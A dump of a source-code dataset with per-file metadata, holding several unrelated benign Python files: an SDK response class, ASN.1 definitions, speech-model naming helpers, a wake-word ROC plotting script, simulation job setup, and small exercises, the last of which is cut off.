blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
552b996cc76cd62cf2dd0b73ebf1972aec0af841
|
988176bcdae841e08106b0fe5cf07aabbc210c83
|
/minimum sum of the maximum elements obtained by considering all consecutive pairs of adjacent elements after rearranging the array suitably.py
|
c871699196e8fd15530261a7480607de06e2522f
|
[] |
no_license
|
gopiprasad008/GUVI_CODEKATA_PYTHON_CODE
|
ce1a63c7eea2a099c01748162c1deb47172dcd0a
|
78f374e344df25aab181408d8f41b3ebe03b34ef
|
refs/heads/master
| 2023-03-16T00:27:31.539524
| 2020-05-16T11:46:08
| 2020-05-16T11:46:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
from itertools import permutations
n = int(input())
l = [int(x) for x in input().split()]
n = len(l)
m = list(permutations(l,len(l)))
a = 0
for i in range(len(m)):
b = 0
for j in range(len(m[i])-1):
b += max(m[i][j], m[i][j+1])
if b > a:
a = b
print(a)
|
[
"noreply@github.com"
] |
gopiprasad008.noreply@github.com
|
087a01950facd0b6e12f0c2c3ec8eeef6135feb5
|
0b01cb61a4ae4ae236a354cbfa23064e9057e434
|
/alipay/aop/api/response/KoubeiTradeOrderEnterpriseQueryResponse.py
|
d46129cc828bcc061ec6d475c1359df544675c21
|
[
"Apache-2.0"
] |
permissive
|
hipacloud/alipay-sdk-python-all
|
e4aec2869bf1ea6f7c6fb97ac7cc724be44ecd13
|
bdbffbc6d5c7a0a3dd9db69c99443f98aecf907d
|
refs/heads/master
| 2022-11-14T11:12:24.441822
| 2020-07-14T03:12:15
| 2020-07-14T03:12:15
| 277,970,730
| 0
| 0
|
Apache-2.0
| 2020-07-08T02:33:15
| 2020-07-08T02:33:14
| null |
UTF-8
|
Python
| false
| false
| 4,551
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class KoubeiTradeOrderEnterpriseQueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiTradeOrderEnterpriseQueryResponse, self).__init__()
self._buyer_user_id = None
self._ext_info = None
self._merchant_subsidy_amount = None
self._order_no = None
self._order_product = None
self._out_order_no = None
self._partner_id = None
self._real_amount = None
self._seller_id = None
self._shop_id = None
self._status = None
self._subject = None
self._subsidy_amount = None
self._total_amount = None
@property
def buyer_user_id(self):
return self._buyer_user_id
@buyer_user_id.setter
def buyer_user_id(self, value):
self._buyer_user_id = value
@property
def ext_info(self):
return self._ext_info
@ext_info.setter
def ext_info(self, value):
self._ext_info = value
@property
def merchant_subsidy_amount(self):
return self._merchant_subsidy_amount
@merchant_subsidy_amount.setter
def merchant_subsidy_amount(self, value):
self._merchant_subsidy_amount = value
@property
def order_no(self):
return self._order_no
@order_no.setter
def order_no(self, value):
self._order_no = value
@property
def order_product(self):
return self._order_product
@order_product.setter
def order_product(self, value):
self._order_product = value
@property
def out_order_no(self):
return self._out_order_no
@out_order_no.setter
def out_order_no(self, value):
self._out_order_no = value
@property
def partner_id(self):
return self._partner_id
@partner_id.setter
def partner_id(self, value):
self._partner_id = value
@property
def real_amount(self):
return self._real_amount
@real_amount.setter
def real_amount(self, value):
self._real_amount = value
@property
def seller_id(self):
return self._seller_id
@seller_id.setter
def seller_id(self, value):
self._seller_id = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def subject(self):
return self._subject
@subject.setter
def subject(self, value):
self._subject = value
@property
def subsidy_amount(self):
return self._subsidy_amount
@subsidy_amount.setter
def subsidy_amount(self, value):
self._subsidy_amount = value
@property
def total_amount(self):
return self._total_amount
@total_amount.setter
def total_amount(self, value):
self._total_amount = value
def parse_response_content(self, response_content):
response = super(KoubeiTradeOrderEnterpriseQueryResponse, self).parse_response_content(response_content)
if 'buyer_user_id' in response:
self.buyer_user_id = response['buyer_user_id']
if 'ext_info' in response:
self.ext_info = response['ext_info']
if 'merchant_subsidy_amount' in response:
self.merchant_subsidy_amount = response['merchant_subsidy_amount']
if 'order_no' in response:
self.order_no = response['order_no']
if 'order_product' in response:
self.order_product = response['order_product']
if 'out_order_no' in response:
self.out_order_no = response['out_order_no']
if 'partner_id' in response:
self.partner_id = response['partner_id']
if 'real_amount' in response:
self.real_amount = response['real_amount']
if 'seller_id' in response:
self.seller_id = response['seller_id']
if 'shop_id' in response:
self.shop_id = response['shop_id']
if 'status' in response:
self.status = response['status']
if 'subject' in response:
self.subject = response['subject']
if 'subsidy_amount' in response:
self.subsidy_amount = response['subsidy_amount']
if 'total_amount' in response:
self.total_amount = response['total_amount']
|
[
"ben.zy@antfin.com"
] |
ben.zy@antfin.com
|
55a28b610c9796ee5d9f9724c9a0bfe4eb09061c
|
f3b233e5053e28fa95c549017bd75a30456eb50c
|
/bace_input/L4M/4M-4J_wat_20Abox/set_3.py
|
4e1279d74cc1ddc180be8d4b21bde67aa12bb920
|
[] |
no_license
|
AnguseZhang/Input_TI
|
ddf2ed40ff1c0aa24eea3275b83d4d405b50b820
|
50ada0833890be9e261c967d00948f998313cb60
|
refs/heads/master
| 2021-05-25T15:02:38.858785
| 2020-02-18T16:57:04
| 2020-02-18T16:57:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
import os
dir = '/mnt/scratch/songlin3/run/bace/L4M/wat_20Abox/ti_one-step/4M_4J/'
filesdir = dir + 'files/'
temp_prodin = filesdir + 'temp_prod_3.in'
temp_pbs = filesdir + 'temp_3.pbs'
lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
for j in lambd:
os.chdir("%6.5f" %(j))
workdir = dir + "%6.5f" %(j) + '/'
#prodin
prodin = workdir + "%6.5f_prod_3.in" %(j)
os.system("cp %s %s" %(temp_prodin, prodin))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, prodin))
#PBS
pbs = workdir + "%6.5f_3.pbs" %(j)
os.system("cp %s %s" %(temp_pbs, pbs))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
#submit pbs
#os.system("qsub %s" %(pbs))
os.chdir(dir)
|
[
"songlin3@msu.edu"
] |
songlin3@msu.edu
|
b84e8238b02903cb56003a86f49f4d732686de63
|
2ec26d004a653c0576594e48ac13dd71f539b30a
|
/gist_dump/sine_destruction.py
|
48a1342ece579d42dc108367e41efe8f91e1bd2b
|
[] |
no_license
|
kastnerkyle/research_megarepo
|
6aca5b2c3b2413e0def1093b23f2826e3e7e5e97
|
ab182667650fd59b99f75d4b599d7ace77a3f30b
|
refs/heads/master
| 2021-01-17T20:31:52.250050
| 2016-12-27T01:28:54
| 2016-12-27T01:28:54
| 68,341,074
| 13
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 419
|
py
|
# Author: Kyle Kastner
# License: BSD 3-clause
import matplotlib.pyplot as plt
import numpy as np
fs = 100 # sample rate of 100 samples / sec, with max f 50
f = 5 # 5 Hz frequency
samples = 25 # .25 seconds of samples @ 100 samples / sec
x = np.arange(samples)
y1 = np.sin(2 * np.pi * f * x / fs + .5 * np.pi)
y2 = np.sin(2 * np.pi * f * x / fs + -.5 * np.pi)
plt.plot(y1)
plt.plot(y2)
plt.plot(y1 + y2)
plt.show()
|
[
"kastnerkyle@gmail.com"
] |
kastnerkyle@gmail.com
|
cf9c444fa59eb0b67c60813865bf38503df80ad9
|
e728a7b5447c4ca03ba799bec61459528f30fd88
|
/esvi/model.py
|
6effe6136b1881fe62efa747a7f8180ffab43f4b
|
[] |
no_license
|
reritom/Esvi
|
deb75c0ca4b17494ed80adc3b735be008e0b3352
|
1e3242c61ec86af7b7479cd71f12a8677fcbde1f
|
refs/heads/master
| 2020-03-20T02:08:01.695643
| 2018-11-04T18:35:52
| 2018-11-04T18:35:52
| 137,100,179
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,492
|
py
|
from esvi import fields
from esvi.query import Query
from esvi.model_instance import ModelInstance
from esvi.query_executor import QueryExecutor
from esvi.model_set import ModelSet
from typing import Optional
class Model():
"""
This class is to be inherited by child models. The static methods for interacting with the DB executor also call __new__
so that the child attributes can be retrieved without the child class needing to be instanciated first.
"""
child_retrieved = False
def __new__(cls, internal=False):
print("In model new")
# To allow the classmethods to access child properties without an explicit instanciation, this method gets called by each
# classmethod. The following flag checks whether it has already been ran or not
if cls.child_retrieved == True and internal == True:
return
# Initialise the model name
cls.model_name = getattr(cls, 'model_name') if hasattr(cls, 'model_name') else cls.__name__ + "Model"
# Initialise the fields
cls.model_fields = dict()
# Primary Key flag
pk_flag = 0
# Here we grab any fields from the child class attributes
for value in dir(cls):
class_attribute = getattr(cls, value)
if hasattr(class_attribute, '__class__') and class_attribute.__class__.__base__ == fields.BaseField:
cls.model_fields[value] = class_attribute
if class_attribute.is_primary():
cls.primary_key = value
pk_flag += 1
if pk_flag is not 1:
raise Exception("Model {0} is missing a primary key field".format(cls.model_name))
cls.child_retrieved = True
cls.executor = QueryExecutor()
return cls
@classmethod
def get_model_name(cls) -> str:
"""
Return the model name from the child
"""
Model.__new__(cls, internal=True)
return cls.model_name
@classmethod
def get_primary_key(cls) -> str:
"""
Return the model name from the child
"""
Model.__new__(cls, internal=True)
return cls.primary_key
@classmethod
def get_fields(cls) -> dict:
"""
Return a dictionary with the field names and their field classes
"""
Model.__new__(cls, internal=True)
return cls.model_fields
@classmethod
def _initialise_in_db(cls) -> None:
"""
This will add the model definition to the DB
"""
Model.__new__(cls, internal=True)
# Here we create the query and pass it to the executor
query = Query(model_name=cls.model_name, model_fields=cls.model_fields, action="initialise")
response = cls.executor.execute(query)
@classmethod
def _get_defition_from_db(cls) -> None:
"""
Retrieves the model fields from the DB in a list of field names in the correct order
"""
Model.__new__(cls, internal=True)
# Here we create the query and pass it to the executor
query = Query(model_name=cls.model_name, model_fields=None, action="definition")
response = cls.executor.execute(query)
@classmethod
def create(cls, **kwargs) -> ModelInstance:
"""
Create a model item in the DB
"""
Model.__new__(cls, internal=True)
# Initialise the content of this model
content = dict()
# Here we validate that the model is being initialised with enough information
for field_name, definition in cls.model_fields.items():
if field_name in kwargs:
# Check if it is in the kwargs
definition.validate(kwargs[field_name])
print("Field name {} is class {}".format(field_name, kwargs[field_name].__class__.__name__))
# If it is a foreign key (the value is a ModelInstance)
if isinstance(kwargs[field_name], ModelInstance):
print("Is model instance")
# We convert the value to the primary key and primary value
primary_key = kwargs[field_name].get_primary_key()
print("Primary key is {}".format(primary_key))
content[primary_key] = kwargs[field_name].get(primary_key)
continue
content[field_name] = kwargs[field_name]
elif definition.has_default():
# Check if it has a default value
content[field_name] = definition.get_default()
else:
raise Exception("{} missing as parameter and has no default".format(field_name))
# Here we create the query and pass it to the executor
query = Query(model_name=cls.model_name, model_fields=cls.model_fields, action="create", content=content)
response = cls.executor.execute(query)
return ModelInstance(model_name=cls.model_name, model_fields=cls.model_fields, model_content=response) if response else None
@classmethod
def retrieve(cls, primary_key_value) -> Optional[ModelInstance]:
"""
Retrieve a single model by primary key
"""
Model.__new__(cls, internal=True)
query = Query(model_name=cls.model_name, model_fields=cls.model_fields, action="retrieve", content=primary_key_value)
response = cls.executor.execute(query)
return ModelInstance(model_name=cls.model_name, model_fields=cls.model_fields, model_content=response) if response else None
@classmethod
def retrieve_all(cls) -> ModelSet:
"""
Retrieve all of the model items from the db and returns them in a model set
"""
Model.__new__(cls, internal=True)
query = Query(model_name=cls.model_name, model_fields=cls.model_fields, action="all")
response = cls.executor.execute(query)
print("Retrieve all response is {}".format(response))
return ModelSet([ModelInstance(model_name=cls.model_name, model_fields=cls.model_fields, model_content=i) for i in response])
@classmethod
def filter(cls, **kwargs) -> ModelSet:
Model.__new__(cls, internal=True)
filters = ['_less_or_equal',
'_greater_or_equal',
'equal',
'_less_than',
'_greater_than',
'between_inc',
'between',
'not']
pass
|
[
"reikudjinn@gmail.com"
] |
reikudjinn@gmail.com
|
18cb063d140ca52402076ae16b83ac2bbdaa92cb
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/third_party/pyasn1_modules/pyasn1_modules/rfc3779.py
|
aaf856e822b6d15286373124b860200a0e6768d6
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,750
|
py
|
#
# This file is part of pyasn1-modules software.
#
# Created by Russ Housley with assistance from asn1ate v.0.6.0.
#
# Copyright (c) 2019, Vigil Security, LLC
# License: http://snmplabs.com/pyasn1/license.html
#
# X.509 Extensions for IP Addresses and AS Identifiers
#
# ASN.1 source from:
# https://www.rfc-editor.org/rfc/rfc3779.txt
#
from pyasn1.type import univ, char, namedtype, namedval, tag, constraint, useful
# IP Address Delegation Extension
id_pe_ipAddrBlocks = univ.ObjectIdentifier('1.3.6.1.5.5.7.1.7')
class IPAddress(univ.BitString):
pass
class IPAddressRange(univ.Sequence):
pass
IPAddressRange.componentType = namedtype.NamedTypes(
namedtype.NamedType('min', IPAddress()),
namedtype.NamedType('max', IPAddress())
)
class IPAddressOrRange(univ.Choice):
pass
IPAddressOrRange.componentType = namedtype.NamedTypes(
namedtype.NamedType('addressPrefix', IPAddress()),
namedtype.NamedType('addressRange', IPAddressRange())
)
class IPAddressChoice(univ.Choice):
pass
IPAddressChoice.componentType = namedtype.NamedTypes(
namedtype.NamedType('inherit', univ.Null()),
namedtype.NamedType('addressesOrRanges', univ.SequenceOf(componentType=IPAddressOrRange()))
)
class IPAddressFamily(univ.Sequence):
pass
IPAddressFamily.componentType = namedtype.NamedTypes(
namedtype.NamedType('addressFamily', univ.OctetString().subtype(subtypeSpec=constraint.ValueSizeConstraint(2, 3))),
namedtype.NamedType('ipAddressChoice', IPAddressChoice())
)
class IPAddrBlocks(univ.SequenceOf):
pass
IPAddrBlocks.componentType = IPAddressFamily()
# Autonomous System Identifier Delegation Extension
id_pe_autonomousSysIds = univ.ObjectIdentifier('1.3.6.1.5.5.7.1.8')
class ASId(univ.Integer):
pass
class ASRange(univ.Sequence):
pass
ASRange.componentType = namedtype.NamedTypes(
namedtype.NamedType('min', ASId()),
namedtype.NamedType('max', ASId())
)
class ASIdOrRange(univ.Choice):
pass
ASIdOrRange.componentType = namedtype.NamedTypes(
namedtype.NamedType('id', ASId()),
namedtype.NamedType('range', ASRange())
)
class ASIdentifierChoice(univ.Choice):
pass
ASIdentifierChoice.componentType = namedtype.NamedTypes(
namedtype.NamedType('inherit', univ.Null()),
namedtype.NamedType('asIdsOrRanges', univ.SequenceOf(componentType=ASIdOrRange()))
)
class ASIdentifiers(univ.Sequence):
pass
ASIdentifiers.componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('asnum', ASIdentifierChoice().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('rdi', ASIdentifierChoice().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
4eb2f293067b5f57a370ad4125140d766cdc0ad6
|
4374b25bd4d7ea4a8d890b08b68ae52ed93c5eaf
|
/neural_sp/bin/model_name.py
|
2121447c1841b0f00c16ed8c596d9bf4f95d6c89
|
[
"Apache-2.0"
] |
permissive
|
smilelite/neural_sp
|
61833dc20f6ddd36b21e55663f539929c69a9399
|
86fee124982f7483656aa6b8d5db3715fda12460
|
refs/heads/master
| 2023-04-06T23:31:19.258575
| 2021-04-06T16:02:11
| 2021-04-06T16:02:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,097
|
py
|
# Copyright 2019 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Set model name."""
import os
from neural_sp.bin.train_utils import load_config
def _define_encoder_name(dir_name, args):
if args.enc_type == 'tds':
from neural_sp.models.seq2seq.encoders.tds import TDSEncoder as module
elif args.enc_type == 'gated_conv':
from neural_sp.models.seq2seq.encoders.gated_conv import GatedConvEncoder as module
elif 'transformer' in args.enc_type:
from neural_sp.models.seq2seq.encoders.transformer import TransformerEncoder as module
elif 'conformer' in args.enc_type:
from neural_sp.models.seq2seq.encoders.conformer import ConformerEncoder as module
else:
from neural_sp.models.seq2seq.encoders.rnn import RNNEncoder as module
if hasattr(module, 'define_name'):
dir_name = module.define_name(dir_name, args)
else:
raise NotImplementedError(module)
return dir_name
def _define_decoder_name(dir_name, args):
if args.dec_type in ['transformer', 'transformer_xl']:
from neural_sp.models.seq2seq.decoders.transformer import TransformerDecoder as module
elif args.dec_type in ['transformer_transducer', 'transformer_transducer_xl']:
from neural_sp.models.seq2seq.decoders.transformer_transducer import TransformerTransducer as module
elif args.dec_type in ['lstm_transducer', 'gru_transducer']:
from neural_sp.models.seq2seq.decoders.rnn_transducer import RNNTransducer as module
elif args.dec_type == 'asg':
from neural_sp.models.seq2seq.decoders.asg import ASGDecoder as module
else:
from neural_sp.models.seq2seq.decoders.las import RNNDecoder as module
if hasattr(module, 'define_name'):
dir_name = module.define_name(dir_name, args)
else:
raise NotImplementedError(module)
return dir_name
def _define_lm_name(dir_name, args):
if 'gated_conv' in args.lm_type:
from neural_sp.models.lm.gated_convlm import GatedConvLM as module
elif args.lm_type == 'transformer':
from neural_sp.models.lm.transformerlm import TransformerLM as module
elif args.lm_type == 'transformer_xl':
from neural_sp.models.lm.transformer_xl import TransformerXL as module
else:
from neural_sp.models.lm.rnnlm import RNNLM as module
if hasattr(module, 'define_name'):
dir_name = module.define_name(dir_name, args)
else:
raise NotImplementedError(module)
return dir_name
def set_asr_model_name(args):
# encoder
dir_name = args.enc_type.replace('conv_', '')
dir_name = _define_encoder_name(dir_name, args)
if args.n_stacks > 1:
dir_name += '_stack' + str(args.n_stacks)
else:
dir_name += '_' + args.subsample_type + str(args.subsample_factor)
if args.sequence_summary_network:
dir_name += '_ssn'
# decoder
if args.ctc_weight < 1:
dir_name = _define_decoder_name(dir_name, args)
# optimization
dir_name += '_' + args.optimizer
if args.optimizer == 'noam':
dir_name += '_lr' + str(args.lr_factor)
else:
dir_name += '_lr' + str(args.lr)
dir_name += '_bs' + str(args.batch_size)
if args.train_dtype in ["O0", "O1", "O2", "O3"]:
dir_name += '_' + args.train_dtype
# if args.shuffle_bucket:
# dir_name += '_bucket'
# if 'transformer' in args.enc_type or 'transformer' in args.dec_type:
# dir_name += '_' + args.transformer_param_init
# regularization
if args.lsm_prob > 0:
dir_name += '_ls' + str(args.lsm_prob)
if args.warmup_n_steps > 0:
dir_name += '_warmup' + str(args.warmup_n_steps)
if args.accum_grad_n_steps > 1:
dir_name += '_accum' + str(args.accum_grad_n_steps)
# LM integration
if args.lm_fusion:
dir_name += '_' + args.lm_fusion
# MTL
if args.mtl_per_batch:
if args.ctc_weight > 0:
dir_name += '_' + args.unit + 'ctc'
if args.bwd_weight > 0:
dir_name += '_' + args.unit + 'bwd'
for sub in ['sub1', 'sub2']:
if args.get('train_set_' + sub) is not None:
dir_name += '_' + args.get('unit_' + sub) + str(args.get('vocab_' + sub))
if args.get('ctc_weight_' + sub, 0) > 0:
dir_name += 'ctc'
if args.get(sub + '_weight', 0) - args.get('ctc_weight_' + sub, 0) > 0:
dir_name += 'fwd'
else:
if args.ctc_weight > 0:
dir_name += '_ctc' + str(args.ctc_weight)
if args.bwd_weight > 0:
dir_name += '_bwd' + str(args.bwd_weight)
for sub in ['sub1', 'sub2']:
if args.get(sub + '_weight', 0) > 0:
dir_name += '_' + args.get('unit_' + sub) + str(args.get('vocab_' + sub))
if args.get('ctc_weight_' + sub, 0) > 0:
dir_name += 'ctc%.1f' % args.get('ctc_weight_' + sub)
if args.get(sub + '_weight', 0) - args.get('ctc_weight_' + sub, 0) > 0:
dir_name += 'fwd%.2f' % (args.total_weight - args.get(sub + '_weight',
0) - args.get('ctc_weight_' + sub, 0))
if args.task_specific_layer:
dir_name += '_tsl'
# SpecAugment
if args.n_freq_masks > 0:
dir_name += '_' + str(args.freq_width) + 'FM' + str(args.n_freq_masks)
if args.n_time_masks > 0:
if args.adaptive_number_ratio > 0:
dir_name += '_pnum' + str(args.adaptive_number_ratio)
else:
dir_name += '_' + str(args.time_width) + 'TM' + str(args.n_time_masks)
if args.adaptive_size_ratio > 0:
dir_name += '_psize' + str(args.adaptive_size_ratio)
if args.input_noise_std > 0:
dir_name += '_Inoise'
if args.weight_noise_std > 0:
dir_name += '_Wnoise'
# contextualization
if args.discourse_aware:
dir_name += '_discourse'
if args.mem_len > 0:
dir_name += '_mem' + str(args.mem_len)
if args.bptt > 0:
dir_name += '_bptt' + str(args.bptt)
# Pre-training
if args.asr_init and os.path.isfile(args.asr_init):
conf_init = load_config(os.path.join(os.path.dirname(args.asr_init), 'conf.yml'))
dir_name += '_' + conf_init['unit'] + 'pt'
if args.freeze_encoder:
dir_name += '_encfreeze'
if args.lm_init:
dir_name += '_lminit'
# knowledge distillation
if args.teacher:
dir_name += '_KD' + str(args.soft_label_weight)
if args.teacher_lm:
dir_name += '_lmKD' + str(args.soft_label_weight)
# MBR training
if args.mbr_training:
dir_name += '_MBR' + str(args.recog_beam_width) + 'best'
dir_name += '_ce' + str(args.mbr_ce_weight) + '_smooth' + str(args.recog_softmax_smoothing)
if args.n_gpus > 1:
dir_name += '_' + str(args.n_gpus) + 'GPU'
return dir_name
def set_lm_name(args):
dir_name = ''
dir_name = _define_lm_name(dir_name, args)
# optimization
dir_name += '_' + args.optimizer
if args.optimizer == 'noam':
dir_name += '_lr' + str(args.lr_factor)
else:
dir_name += '_lr' + str(args.lr)
dir_name += '_bs' + str(args.batch_size)
if args.train_dtype in ["O0", "O1", "O2", "O3"]:
dir_name += '_' + args.train_dtype
dir_name += '_bptt' + str(args.bptt)
# regularization
dir_name += '_dropI' + str(args.dropout_in) + 'H' + str(args.dropout_hidden)
if args.get('dropout_layer', 0) > 0:
dir_name += 'Layer' + str(args.dropout_layer)
if args.lsm_prob > 0:
dir_name += '_ls' + str(args.lsm_prob)
if args.warmup_n_steps > 0:
dir_name += '_warmup' + str(args.warmup_n_steps)
if args.accum_grad_n_steps > 1:
dir_name += '_accum' + str(args.accum_grad_n_steps)
if args.backward:
dir_name += '_bwd'
if args.shuffle:
dir_name += '_shuffle'
if args.serialize:
dir_name += '_serialize'
return dir_name
|
[
"hiro.mhbc@gmail.com"
] |
hiro.mhbc@gmail.com
|
4a94d4e0f476fcbb73a0a653a656166d0438ab10
|
2be678ddc49b9ce9c2f7bd198d12b6be94374ddd
|
/precise/scripts/graph.py
|
14cf83e4ec816dd3eabc2a3e18c0d72b66f281b2
|
[
"Apache-2.0"
] |
permissive
|
andreselizondo-adestech/mycroft-precise
|
2a7f08c7d74d39a1455ea1c15ded47fdedc89096
|
0e0ac5b8b14ff6a6ecffd300c40049131990e8c9
|
refs/heads/dev
| 2021-05-21T01:21:30.066505
| 2020-08-19T19:37:05
| 2020-08-19T19:37:05
| 252,484,092
| 3
| 1
|
Apache-2.0
| 2020-08-19T19:32:00
| 2020-04-02T14:49:40
|
Python
|
UTF-8
|
Python
| false
| false
| 5,814
|
py
|
#!/usr/bin/env python3
# Copyright 2019 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import numpy as np
from functools import partial
from os.path import basename, splitext
from prettyparse import Usage
from typing import Callable, Tuple
from precise.network_runner import Listener
from precise.params import inject_params, pr
from precise.scripts.base_script import BaseScript
from precise.stats import Stats
from precise.threshold_decoder import ThresholdDecoder
from precise.train_data import TrainData
def get_thresholds(points=100, power=3) -> list:
"""Run a function with a series of thresholds between 0 and 1"""
return [(i / (points + 1)) ** power for i in range(1, points + 1)]
class CachedDataLoader:
"""
Class for reloading train data every time the params change
Args:
loader: Function that loads the train data (something that calls TrainData.load)
"""
def __init__(self, loader: Callable):
self.prev_cache = None
self.data = None
self.loader = loader
def load_for(self, model: str) -> Tuple[list, list]:
"""Injects the model parameters, reloading if they changed, and returning the data"""
inject_params(model)
if self.prev_cache != pr.vectorization_md5_hash():
self.prev_cache = pr.vectorization_md5_hash()
self.data = self.loader()
return self.data
def load_plt():
try:
import matplotlib.pyplot as plt
return plt
except ImportError:
print('Please install matplotlib first')
raise SystemExit(2)
def calc_stats(model_files, loader, use_train, filenames):
model_data = {}
for model in model_files:
train, test = loader.load_for(model)
inputs, targets = train if use_train else test
print('Running network...')
predictions = Listener.find_runner(model)(model).predict(inputs)
print(inputs.shape, targets.shape)
print('Generating statistics...')
stats = Stats(predictions, targets, filenames)
print('\n' + stats.counts_str() + '\n\n' + stats.summary_str() + '\n')
model_name = basename(splitext(model)[0])
model_data[model_name] = stats
return model_data
class GraphScript(BaseScript):
usage = Usage('''
Show ROC curves for a series of models
...
:-t --use-train
Evaluate training data instead of test data
:-nf --no-filenames
Don't print out the names of files that failed
:-r --resolution int 100
Number of points to generate
:-p --power float 3.0
Power of point distribution
:-l --labels
Print labels attached to each point
:-o --output-file str -
File to write data instead of displaying it
:-i --input-file str -
File to read data from and visualize
...
''')
usage.add_argument('models', nargs='*', help='Either Keras (.net) or TensorFlow (.pb) models to test')
usage |= TrainData.usage
def __init__(self, args):
super().__init__(args)
if not args.models and not args.input_file and args.folder:
args.input_file = args.folder
if bool(args.models) == bool(args.input_file):
raise ValueError('Please specify either a list of models or an input file')
if not args.output_file:
load_plt() # Error early if matplotlib not installed
def run(self):
args = self.args
if args.models:
data = TrainData.from_both(args.tags_file, args.tags_folder, args.folder)
print('Data:', data)
filenames = sum(data.train_files if args.use_train else data.test_files, [])
loader = CachedDataLoader(partial(
data.load, args.use_train, not args.use_train, shuffle=False
))
model_data = calc_stats(args.models, loader, args.use_train, filenames)
else:
model_data = {
name: Stats.from_np_dict(data) for name, data in np.load(args.input_file)['data'].item().items()
}
for name, stats in model_data.items():
print('=== {} ===\n{}\n\n{}\n'.format(name, stats.counts_str(), stats.summary_str()))
if args.output_file:
np.savez(args.output_file, data={name: stats.to_np_dict() for name, stats in model_data.items()})
else:
plt = load_plt()
decoder = ThresholdDecoder(pr.threshold_config, pr.threshold_center)
thresholds = [decoder.encode(i) for i in np.linspace(0.0, 1.0, args.resolution)[1:-1]]
for model_name, stats in model_data.items():
x = [stats.false_positives(i) for i in thresholds]
y = [stats.false_negatives(i) for i in thresholds]
plt.plot(x, y, marker='x', linestyle='-', label=model_name)
if args.labels:
for x, y, threshold in zip(x, y, thresholds):
plt.annotate('{:.4f}'.format(threshold), (x, y))
plt.legend()
plt.xlabel('False Positives')
plt.ylabel('False Negatives')
plt.show()
main = GraphScript.run_main
if __name__ == '__main__':
main()
|
[
"matthew331199@gmail.com"
] |
matthew331199@gmail.com
|
f6835052381793f2c861225e2220abd09398454e
|
61dd3524e904ee055a761815239da55db26f03eb
|
/PYTHON-SALA DE AULA/Exercicios condicionais/exe-37.py
|
42797fee163339669239668fce6cbf3207f3a018
|
[
"Apache-2.0"
] |
permissive
|
JaumVitor/HOMEWORK-PYTHON
|
149e4cb6d10421d1e980dd5b75a92f87355582f8
|
7be3299f36af3a924fc5c6f4a63aeed0fd8fb38e
|
refs/heads/master
| 2022-09-15T11:00:55.019562
| 2022-08-26T18:46:06
| 2022-08-26T18:46:06
| 256,103,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,123
|
py
|
print ('- salários até R$ 280,00 (incluindo) : aumento de 20%')
print ('- salários entre R$ 280,00 e R$ 700,00 : aumento de 15%')
print ('- salários entre R$ 700,00 e R$ 1500,00 : aumento de 10%')
print ('-salários de R$ 1.500,00 em diante : aumento de 5%')
print ('='*43)
sal = float ( input ('Qual valor do salario ? '))
if (sal <= 280 ):
nsal1 = ( sal * 1.20 )
